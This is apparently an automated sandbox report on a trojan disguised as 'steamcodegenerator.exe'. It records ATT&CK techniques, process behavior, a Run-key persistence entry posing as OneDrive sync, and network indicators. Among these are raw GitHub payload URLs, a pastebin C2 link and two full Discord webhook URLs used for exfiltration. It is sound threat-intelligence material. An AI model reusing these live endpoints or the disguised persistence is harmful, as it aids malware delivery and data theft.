Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663549880 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF663549880
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
131
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
NTDS131
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Application Window Discovery
SSHKeylogging15
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534102 Sample: steamcodegenerator.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 96 45 pastebin.com 2->45 47 raw.githubusercontent.com 2->47 49 3 other IPs or domains 2->49 67 Suricata IDS alerts for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Multi AV Scanner detection for submitted file 2->71 75 2 other signatures 2->75 9 steamcodegenerator.exe 14 2->9         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 73 Connects to a pastebin service (likely for C&C) 45->73 process4 dnsIp5 51 objects.githubusercontent.com 185.199.109.133, 443, 49736, 49737 FASTLYUS Netherlands 9->51 53 github.com 140.82.121.3, 443, 49735 GITHUBUS United States 9->53 77 Suspicious powershell command line found 9->77 79 Found direct / indirect Syscall (likely to bypass EDR) 9->79 17 powershell.exe 12 9->17         started        20 conhost.exe 9->20         started        22 powershell.exe 7 13->22         started        24 conhost.exe 1 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 1 15->28         started        signatures6 process7 signatures8 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->61 63 Suspicious powershell command line found 17->63 65 Powershell creates an autostart link 17->65 30 powershell.exe 15 20 17->30         started        35 powershell.exe 13 22->35         started        37 powershell.exe 26->37         started        process9 dnsIp10 55 discord.com 162.159.138.232, 443, 49742, 49749 CLOUDFLARENETUS United States 30->55 43 C:\ProgramData\...\BeginSync.lnk, MS 30->43 dropped 59 Tries to open files direct via NTFS file id 30->59 39 conhost.exe 30->39         started        41 attrib.exe 1 30->41         started        57 pastebin.com 172.67.19.24, 443, 49740, 49741 CLOUDFLARENETUS United States 35->57 file11 signatures12 process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
steamcodegenerator.exe42%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    unknown
    github.com
    140.82.121.3
    truefalse
      unknown
      raw.githubusercontent.com
      185.199.109.133
      truetrue
        unknown
        objects.githubusercontent.com
        185.199.109.133
        truefalse
          unknown
          pastebin.com
          172.67.19.24
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://github.com/user-attachments/files/17267811/stm.txtfalse
              unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                unknown
                https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
                  unknown
                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                    unknown
                    http://pastebin.com/raw/sA04Mwk2false
                      unknown
                      https://pastebin.com/raw/sA04Mwk2false
                        unknown
                        https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txtfalse
                          unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                            unknown
                            http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txtfalse
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/user-attachments/files/17267811/stm.txt$steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/user-attachments/files/17267811/stm.txt%pinvalidsteamcodegenerator.exefalse
                                            unknown
                                            https://contoso.com/powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://github.com/user-attachments/files/17267811/stm.txtnpsteamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://objects.githubusercontent.com/steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://github.com/user-attachments/files/17267811/stm.txtasteamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://github.com/user-attachments/files/17267811/stm.txtllsteamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://oneget.orgXpowershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://oneget.orgpowershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    172.67.19.24
                                                    pastebin.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    162.159.138.232
                                                    discord.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    185.199.109.133
                                                    raw.githubusercontent.comNetherlands
                                                    54113FASTLYUStrue
                                                    140.82.121.3
                                                    github.comUnited States
                                                    36459GITHUBUSfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1534102
                                                    Start date and time:2024-10-15 15:58:21 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 53s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:18
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:steamcodegenerator.exe
                                                    Detection:MAL
                                                    Classification:mal96.troj.evad.winEXE@21/17@5/4
                                                    EGA Information:
                                                    • Successful, ratio: 50%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 12
                                                    • Number of non-executed functions: 73
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: steamcodegenerator.exe
                                                    TimeTypeDescription
                                                    14:59:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                    14:59:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    172.67.19.24cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                    • pastebin.com/raw/sA04Mwk2
                                                    BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                    • pastebin.com/raw/sA04Mwk2
                                                    cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                    • pastebin.com/raw/sA04Mwk2
                                                    cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                    • pastebin.com/raw/sA04Mwk2
                                                    envifa.vbsGet hashmaliciousUnknownBrowse
                                                    • pastebin.com/raw/V9y5Q5vv
                                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                                    • pastebin.com/raw/V9y5Q5vv
                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    162.159.138.232Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                              SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                    http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      discord.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 162.159.138.232
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      raw.githubusercontent.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 185.199.111.133
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • 185.199.109.133
                                                                      na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                      • 185.199.108.133
                                                                      objects.githubusercontent.comSecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      https://www.newtonsoft.com/jsonGet hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                      • 185.199.111.133
                                                                      SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      github.com0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                      • 140.82.112.4
                                                                      0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                      • 140.82.121.3
                                                                      Telex-copy-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                      • 140.82.121.4
                                                                      https://www.mycimalive.com/Get hashmaliciousUnknownBrowse
                                                                      • 140.82.121.4
                                                                      Payment.Telex-pdf (2).jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                      • 140.82.121.3
                                                                      Payment.Telex-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                      • 140.82.121.4
                                                                      srSirV44HB.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                      • 140.82.121.3
                                                                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                      • 140.82.121.3
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 172.67.19.24
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 162.159.138.232
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 104.18.111.161
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.27.206.92
                                                                      CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 172.67.19.24
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 162.159.138.232
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 104.18.111.161
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.135.232
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.27.206.92
                                                                      FASTLYUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 185.199.111.133
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 185.199.111.133
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.110.133
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.199.108.133
                                                                      https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                      • 151.101.1.229
                                                                      na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • 185.199.109.133
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.19.24
                                                                      • 162.159.138.232
                                                                      • 185.199.109.133
                                                                      37f463bf4616ecd445d4a1937da06e19Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      Prximos VencimientosPDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      dg_official01.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      doc-Impostos.cmdGet hashmaliciousUnknownBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      Proforma_InvoicePDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 185.199.109.133
                                                                      • 140.82.121.3
                                                                      No context
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                      Category:dropped
                                                                      Size (bytes):1728
                                                                      Entropy (8bit):4.527272298423835
                                                                      Encrypted:false
                                                                      SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                      MD5:724AA21828AD912CB466E3B0A79F478B
                                                                      SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                      SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                      SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                      Malicious:true
